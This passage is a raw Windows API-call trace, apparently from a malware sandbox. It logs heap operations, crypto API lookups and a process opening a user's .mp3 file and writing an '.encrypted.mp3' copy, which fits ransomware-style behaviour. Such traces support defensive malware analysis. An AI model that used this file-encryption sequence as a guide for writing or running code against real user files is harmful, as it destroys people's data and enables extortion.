returned 0x88ce38 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.211] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0037.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.213] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.213] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0_h8m557-v1.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.217] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.217] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.217] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0_h8m557-v1.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0037.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.218] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.218] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1143, lpOverlapped=0x0) returned 1 [0037.219] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1143) returned 0x7c9968 [0037.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.220] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 